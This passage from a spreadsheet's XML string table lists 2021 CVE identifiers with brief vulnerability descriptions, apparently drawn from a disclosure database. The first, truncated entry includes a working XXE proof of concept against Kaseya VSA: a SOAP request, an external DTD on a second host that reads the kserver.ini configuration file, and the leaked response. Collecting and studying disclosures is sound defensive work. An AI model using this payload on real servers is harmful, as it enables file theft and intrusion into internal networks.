    <t>The API /vsaWS/KaseyaWS.asmx can be used to submit XML to the system. When this XML is processed (external) entities are insecurely processed and fetched by the system and returned to the attacker. Detailed description Given the following request: ``` POST /vsaWS/KaseyaWS.asmx HTTP/1.1 Content-Type: text/xml;charset=UTF-8 Host: 192.168.1.194:18081 Content-Length: 406 &lt;soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:kas="KaseyaWS"&gt; &lt;soapenv:Header/&gt; &lt;soapenv:Body&gt; &lt;kas:PrimitiveResetPassword&gt; &lt;!--type: string--&gt; &lt;kas:XmlRequest&gt;&lt;![CDATA[&lt;!DOCTYPE data SYSTEM "http://192.168.1.170:8080/oob.dtd"&gt;&lt;data&gt;&amp;send;&lt;/data&gt;]]&gt; &lt;/kas:XmlRequest&gt; &lt;/kas:PrimitiveResetPassword&gt; &lt;/soapenv:Body&gt; &lt;/soapenv:Envelope&gt; ``` And the following XML file hosted at http://192.168.1.170/oob.dtd: ``` &lt;!ENTITY % file SYSTEM "file://c:\\kaseya\\kserver\\kserver.ini"&gt; &lt;!ENTITY % eval "&lt;!ENTITY &amp;#x25; error SYSTEM 'file:///nonexistent/%file;'&gt;"&gt; %eval; %error; ``` The server will fetch this XML file and process it, it will read the file c:\\kaseya\\kserver\\kserver.ini and returns the content in the server response like below. Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Fri, 02 Apr 2021 10:07:38 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 2677 &lt;?xml version="1.0" encoding="utf-8"?&gt;&lt;soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"&gt;&lt;soap:Body&gt;&lt;soap:Fault&gt;&lt;faultcode&gt;soap:Server&lt;/faultcode&gt;&lt;faultstring&gt;Server was unable to process request. ---&amp;gt; There is an error in XML document (24, -1000).\r\n\r\nSystem.Xml.XmlException: Fragment identifier '######################################################################## # This is the configuration file for the KServer. # Place it in the same directory as the KServer executable # A blank line or new valid section header [] terminates each section. # Comment lines start with ; or # ######################################################################## &lt;snip&gt; ``` Security issues discovered --- * The API insecurely resolves external XML entities * The API has an overly verbose error response Impact --- Using this vulnerability an attacker can read any file on the server the webserver process can read. Additionally, it can be used to perform HTTP(s) requests into the local network and thus use the Kaseya system to pivot into the local network.</t>
  </si>
  <si>
    <t>CVE-2021-30209</t>
  </si>
  <si>
    <t>Textpattern V4.8.4 contains an arbitrary file upload vulnerability where a plug-in can be loaded in the background without any security verification, which may lead to obtaining system permissions.</t>
  </si>
  <si>
    <t>CVE-2021-3021</t>
  </si>
  <si>
    <t>ISPConfig before 3.2.2 allows SQL injection.</t>
  </si>
  <si>
    <t>CVE-2021-30211</t>
  </si>
  <si>
    <t>Knowage Suite 7.3 is vulnerable to Stored Cross-Site Scripting (XSS). An attacker can inject arbitrary web script in '/knowage/restful-services/signup/update' via the 'surname' parameter.</t>
  </si>
  <si>
    <t>CVE-2021-30212</t>
  </si>
  <si>
    <t>Knowage Suite 7.3 is vulnerable to Stored Cross-Site Scripting (XSS). An attacker can inject arbitrary web script in '/knowage/restful-services/documentnotes/saveNote' via the 'nota' parameter.</t>
  </si>
  <si>
    <t>CVE-2021-30213</t>
  </si>
  <si>
    <t>Knowage Suite 7.3 is vulnerable to unauthenticated reflected cross-site scripting (XSS). An attacker can inject arbitrary web script in '/servlet/AdapterHTTP' via the 'targetService' parameter.</t>
  </si>
  <si>
    <t>CVE-2021-30214</t>
  </si>
  <si>
    <t>Knowage Suite 7.3 is vulnerable to Stored Client-Side Template Injection in '/knowage/restful-services/signup/update' via the 'name' parameter.</t>
  </si>
  <si>
    <t>CVE-2021-30218</t>
  </si>
  <si>
    <t>samurai 1.2 has a NULL pointer dereference in writefile() in util.c via a crafted build file.</t>
  </si>
  <si>
    <t>CVE-2021-30219</t>
  </si>
  <si>
    <t>samurai 1.2 has a NULL pointer dereference in printstatus() function in build.c via a crafted build file.</t>
  </si>
  <si>
    <t>CVE-2021-3022</t>
  </si>
  <si>
    <t>An issue was discovered on LG mobile devices with Android OS 10 software. There was no write protection for the MTK protect2 partition. The LG ID is LVE-SMP-200028 (January 2021).</t>
  </si>
  <si>
    <t>CVE-2021-30224</t>
  </si>
  <si>
    <t>Cross Site Request Forgery (CSRF) in Rukovoditel v2.8.3 allows attackers to create an admin user with an arbitrary credentials.</t>
  </si>
  <si>
    <t>CVE-2021-30227</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability in the article comments feature in emlog 6.0.</t>
  </si>
  <si>
    <t>CVE-2021-30228</t>
  </si>
  <si>
    <t>The api/ZRAndlink/set_ZRAndlink interface in China Mobile An Lianbao WF-1 router 1.0.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the iandlink_proc_enable parameter.</t>
  </si>
  <si>
    <t>CVE-2021-30229</t>
  </si>
  <si>
    <t>The api/zrDm/set_zrDm interface in China Mobile An Lianbao WF-1 router 1.0.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the dm_enable, AppKey, or Pwd parameter.</t>
  </si>
  <si>
    <t>CVE-2021-30230</t>
  </si>
  <si>
    <t>The api/ZRFirmware/set_time_zone interface in China Mobile An Lianbao WF-1 router 1.0.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the zonename parameter.</t>
  </si>
  <si>
    <t>CVE-2021-30231</t>
  </si>
  <si>
    <t>The api/zrDm/set_ZRElink interface in China Mobile An Lianbao WF-1 router 1.0.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the bssaddr, abiaddr, devtoken, devid, elinksync, or elink_proc_enable parameter.</t>
  </si>
  <si>
    <t>CVE-2021-30232</t>
  </si>
  <si>
    <t>The api/ZRIGMP/set_IGMP_PROXY interface in China Mobile An Lianbao WF-1 router 1.0.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the IGMP_PROXY_WAN_CONNECT parameter.</t>
  </si>
  <si>
    <t>CVE-2021-30233</t>
  </si>
  <si>
    <t>The api/ZRIptv/setIptvInfo interface in China Mobile An Lianbao WF-1 router 1.0.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the iptv_vlan parameter.</t>
  </si>
  <si>
    <t>CVE-2021-30234</t>
  </si>
  <si>
    <t>The api/ZRIGMP/set_MLD_PROXY interface in China Mobile An Lianbao WF-1 router 1.0.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the MLD_PROXY_WAN_CONNECT parameter.</t>
  </si>
  <si>
    <t>CVE-2021-3024</t>
  </si>
  <si>
    <t>HashiCorp Vault and Vault Enterprise disclosed the internal IP address of the Vault node when responding to some invalid, unauthenticated HTTP requests. Fixed in 1.6.2 &amp; 1.5.7.</t>
  </si>
  <si>
    <t>CVE-2021-30245</t>
  </si>
  <si>
    <t>The project received a report that all versions of Apache OpenOffice through 4.1.8 can open non-http(s) hyperlinks. The problem has existed since about 2006 and the issue is also in 4.1.9. If the link is specifically crafted this could lead to untrusted code execution. It is always best practice to be careful opening documents from unknown and unverified sources. The mitigation in Apache OpenOffice 4.1.10 (unreleased) assures that a security warning is displayed giving the user the option of continuing to open the hyperlink.</t>
  </si>
  <si>
    <t>CVE-2021-30246</t>
  </si>
  <si>
    <t>In the jsrsasign package through 10.1.13 for Node.js, some invalid RSA PKCS#1 v1.5 signatures are mistakenly recognized to be valid. NOTE: there is no known practical attack.</t>
  </si>
  <si>
    <t>CVE-2021-3025</t>
  </si>
  <si>
    <t>Invision Community IPS Community Suite before 4.5.4.2 allows SQL Injection via the Downloads REST API (the sortDir parameter in a sortBy=popular action to the GETindex() method in applications/downloads/api/files.php).</t>
  </si>
  <si>
    <t>CVE-2021-30254</t>
  </si>
  <si>
    <t>Possible buffer overflow due to improper input validation in factory calibration and test DIAG command in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2021-30255</t>
  </si>
  <si>
    <t>Possible buffer overflow due to improper input validation in PDM DIAG command in FTM in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2021-30256</t>
  </si>
  <si>
    <t>Possible stack overflow due to improper validation of camera name length before copying the name in VR Service in Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT</t>
  </si>
  <si>
    <t>CVE-2021-30257</t>
  </si>
  <si>
    <t>Possible out of bound read or write in VR service due to lack of validation of DSP selection values in Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT</t>
  </si>
  <si>
    <t>CVE-2021-30258</t>
  </si>
  <si>
    <t>Possible buffer overflow due to improper size calculation of payload received in VR service in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2021-30259</t>
  </si>
  <si>
    <t>Possible out of bound access due to improper validation of function table entries in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2021-3026</t>
  </si>
  <si>
    <t>Invision Community IPS Community Suite before 4.5.4.2 allows XSS during the quoting of a post or comment.</t>
  </si>
  <si>
    <t>CVE-2021-30260</t>
  </si>
  <si>
    <t>Possible Integer overflow to buffer overflow issue can occur due to improper validation of input parameters when extscan hostlist configuration command is received in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2021-30261</t>
  </si>
  <si>
    <t>Possible integer and heap overflow due to lack of input command size validation while handling beacon template update command from HLOS in Snapdragon Auto, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2021-30262</t>
  </si>
  <si>
    <t>Improper validation of a socket state when socket events are being sent to clients can lead to invalid access of memory in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2021-30263</t>
  </si>
  <si>
    <t>Possible race condition can occur due to lack of synchronization mechanism when On-Device Logging node open twice concurrently in Snapdragon Compute, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music</t>
  </si>
  <si>
    <t>CVE-2021-30264</t>
  </si>
  <si>
    <t>Possible use after free due improper validation of reference from call back to internal store table in Snapdragon Auto, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2021-30265</t>
  </si>
  <si>
    <t>Possible memory corruption due to improper validation of memory address while processing user-space IOCTL for clearing Filter and Route statistics in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2021-30266</t>
  </si>
  <si>
    <t>Possible use after free due to improper memory validation when initializing new interface via Interface add command in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2021-30267</t>
  </si>
  <si>
    <t>Possible integer overflow to buffer overflow due to improper input validation in FTM ARA commands in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2021-30268</t>
  </si>
  <si>
    <t>Possible heap Memory Corruption Issue due to lack of input validation when sending HWTC IQ Capture command in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2021-30269</t>
  </si>
  <si>
    <t>Possible null pointer dereference due to lack of TLB validation for user provided address in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Voice &amp; Music, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2021-3027</t>
  </si>
  <si>
    <t>app/views_mod/user/user.py in LibrIT PaSSHport through 2.5 is affected by LDAP Injection. There is an information leak through the crafting of special queries, escaping the provided search filter because user input gets no sanitization.</t>
  </si>
  <si>
    <t>CVE-2021-30270</t>
  </si>
  <si>
    <t>Possible null pointer dereference in thread profile trap handler due to lack of thread ID validation before dereferencing it in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Voice &amp; Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2021-30271</t>
  </si>
  <si>
    <t>Possible null pointer dereference in trap handler due to lack of thread ID validation before dereferencing it in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Voice &amp; Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2021-30272</t>
  </si>
  <si>
    <t>Possible null pointer dereference in thread cache operation handler due to lack of validation of user provided input in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Voice &amp; Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2021-30273</t>
  </si>
  <si>
    <t>Possible assertion due to improper handling of IPV6 packet with invalid length in destination options header in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2021-30274</t>
  </si>
  <si>
    <t>Possible integer overflow in access control initialization interface due to lack and size and address validation in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Voice &amp; Music, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2021-30275</t>
  </si>
  <si>
    <t>Possible integer overflow in page alignment interface due to lack of address and size validation before alignment in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Voice &amp; Music, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2021-30276</t>
  </si>
  <si>
    <t>Improper access control while doing XPU re-configuration dynamically can lead to unauthorized access to a secure resource in Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2021-30278</t>
  </si>
  <si>
    <t>Improper input validation in TrustZone memory transfer interface can lead to information disclosure in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Voice &amp; Music, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2021-30279</t>
  </si>
  <si>
    <t>Possible access control violation while setting current permission for VMIDs due to improper permission masking in Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2021-3028</t>
  </si>
  <si>
    <t>git-big-picture before 1.0.0 mishandles ' characters in a branch name, leading to code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30281</t>
  </si>
  <si>
    <t>Possible unauthorized access to secure space due to improper check of data allowed while flashing the no access control device configuration in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Voice &amp; Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2021-30282</t>
  </si>
  <si>
    <t>Possible out of bound write in RAM partition table due to improper validation on number of partitions provided in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Voice &amp; Music, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2021-30283</t>
  </si>
  <si>
    <t>Possible denial of service due to improper handling of debug register trap from user applications in Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2021-30284</t>
  </si>
  <si>
    <t>Possible information exposure and denial of service due to NAS not dropping messages when integrity check fails in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2021-30285</t>
  </si>
  <si>
    <t>Improper validation of memory region in Hypervisor can lead to incorrect region mapping in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Voice &amp; Music, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2021-30287</t>
  </si>
  <si>
    <t>Possible assertion due to improper validation of symbols configured for PDCCH monitoring in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2021-30288</t>
  </si>
  <si>
    <t>Possible stack overflow due to improper length check of TLV while copying the TLV to a local stack variable in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2021-30289</t>
  </si>
  <si>
    <t>Possible buffer overflow due to lack of range check while processing a DIAG command for COEX management in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2021-3029</t>
  </si>
  <si>
    <t>** UNSUPPORTED WHEN ASSIGNED ** EVOLUCARE ECSIMAGING (aka ECS Imaging) through 6.21.5 has an OS Command Injection vulnerability via shell metacharacters and an IFS manipulation. The parameter "file" on the webpage /showfile.php can be exploited to gain root access. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.</t>
  </si>
  <si>
    <t>CVE-2021-30290</t>
  </si>
  <si>
    <t>Possible null pointer dereference due to race condition between timeline fence signal and time line fence destroy in Snapdragon Auto, Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2021-30291</t>
  </si>
  <si>
    <t>Possible memory corruption due to lack of validation of client data used for memory allocation in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2021-30292</t>
  </si>
  <si>
    <t>CVE-2021-30293</t>
  </si>
  <si>
    <t>Possible assertion due to lack of input validation in PUSCH configuration in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT</t>
  </si>
  <si>
    <t>CVE-2021-30294</t>
  </si>
  <si>
    <t>Potential null pointer dereference in KGSL GPU auxiliary command due to improper validation of user input in Snapdragon Auto, Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2021-30295</t>
  </si>
  <si>
    <t>Possible heap overflow due to improper validation of local variable while storing current task information locally in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2021-30297</t>
  </si>
  <si>
    <t>Possible out of bound read due to improper validation of packet length while handling data transfer in VR service in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2021-30298</t>
  </si>
  <si>
    <t>Possible out of bound access due to improper validation of item size and DIAG memory pools data while switching between USB and PCIE interface in Snapdragon Auto, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2021-30300</t>
  </si>
  <si>
    <t>Possible denial of service due to incorrectly decoding hex data for the SIB2 OTA message and assigning a garbage value to choice when processing the SRS configuration in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Voice &amp; Music, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2021-30301</t>
  </si>
  <si>
    <t>Possible denial of service due to out of memory while processing RRC and NAS OTA message in Snapdragon Auto, Snapdragon Industrial IOT, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2021-30302</t>
  </si>
  <si>
    <t>Improper authentication of EAP WAPI EAPOL frames from unauthenticated user can lead to information disclosure in Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2021-30303</t>
  </si>
  <si>
    <t>Possible buffer overflow due to lack of buffer length check when segmented WMI command is received in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2021-30304</t>
  </si>
  <si>
    <t>Possible buffer out of bound read can occur due to improper validation of TBTT count and length while parsing the beacon response in Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity</t>
  </si>
  <si>
    <t>CVE-2021-30305</t>
  </si>
  <si>
    <t>Possible out of bound access due to lack of validation of page offset before page is inserted in Snapdragon Auto, Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2021-30306</t>
  </si>
  <si>
    <t>Possible buffer over read due to improper buffer allocation for file length passed from user space in Snapdragon Auto, Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2021-30307</t>
  </si>
  <si>
    <t>Possible denial of service due to improper validation of DNS response when DNS client requests with PTR, NAPTR or SRV query type in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT</t>
  </si>
  <si>
    <t>CVE-2021-30308</t>
  </si>
  <si>
    <t>Possible buffer overflow while printing the HARQ memory partition detail due to improper validation of buffer size in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2021-30309</t>
  </si>
  <si>
    <t>Improper size validation of QXDM commands can lead to memory corruption in Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2021-3031</t>
  </si>
  <si>
    <t>Padding bytes in Ethernet packets on PA-200, PA-220, PA-500, PA-800, PA-2000 Series, PA-3000 Series, PA-3200 Series, PA-5200 Series, and PA-7000 Series firewalls are not cleared before the data frame is created. This leaks a small amount of random information from the firewall memory into the Ethernet packets. An attacker on the same Ethernet subnet as the PAN-OS firewall is able to collect potentially sensitive information from these packets. This issue is also known as Etherleak and is detected by security scanners as CVE-2003-0001. This issue impacts: PAN-OS 8.1 version earlier than PAN-OS 8.1.18; PAN-OS 9.0 versions earlier than PAN-OS 9.0.12; PAN-OS 9.1 versions earlier than PAN-OS 9.1.5.</t>
  </si>
  <si>
    <t>CVE-2021-30310</t>
  </si>
  <si>
    <t>Possible buffer overflow due to Improper validation of received CF-ACK and CF-Poll data frames in Snapdragon Auto, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice &amp; Music</t>
  </si>
  <si>
    <t>CVE-2021-30311</t>
  </si>
  <si>
    <t>Possible heap overflow due to lack of index validation before allocating and writing to heap buffer in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2021-30312</t>
  </si>
  <si>
    <t>Improper authentication of sub-frames of a multicast AMSDU frame can lead to information disclosure in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2021-30313</t>
  </si>
  <si>
    <t>Use after free condition can occur in wired connectivity due to a race condition while creating and deleting folders in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2021-30314</t>
  </si>
  <si>
    <t>Lack of validation for third party application accessing the service can lead to information disclosure in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2021-30315</t>
  </si>
  <si>
    <t>Improper handling of sensor HAL structure in absence of sensor can lead to use after free in Snapdragon Auto</t>
  </si>
  <si>
    <t>CVE-2021-30316</t>
  </si>
  <si>
    <t>Possible out of bound memory access due to improper boundary check while creating HSYNC fence in Snapdragon Auto, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2021-30317</t>
  </si>
  <si>
    <t>Improper validation of program headers containing ELF metadata can lead to image verification bypass in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2021-30318</t>
  </si>
  <si>
    <t>Improper validation of input when provisioning the HDCP key can lead to memory corruption in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Voice &amp; Music, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2021-30319</t>
  </si>
  <si>
    <t>Possible integer overflow due to improper validation of command length parameters while processing WMI command in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music</t>
  </si>
  <si>
    <t>CVE-2021-3032</t>
  </si>
  <si>
    <t>An information exposure through log file vulnerability exists in Palo Alto Networks PAN-OS software where configuration secrets for the “http”, “email”, and “snmptrap” v3 log forwarding server profiles can be logged to the logrcvr.log system log. Logged information may include up to 1024 bytes of the configuration including the username and password in an encrypted form and private keys used in any certificate profiles set for log forwarding server profiles. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.18; PAN-OS 9.0 versions earlier than PAN-OS 9.0.12; PAN-OS 9.1 versions earlier than PAN-OS 9.1.4; PAN-OS 10.0 versions earlier than PAN-OS 10.0.1.</t>
  </si>
  <si>
    <t>CVE-2021-30321</t>
  </si>
  <si>
    <t>Possible buffer overflow due to lack of parameter length check during MBSSID scan IE parse in Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity</t>
  </si>
  <si>
    <t>CVE-2021-30322</t>
  </si>
  <si>
    <t>Possible out of bounds write due to improper validation of number of GPIOs configured in an internal parameters array in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2021-30323</t>
  </si>
  <si>
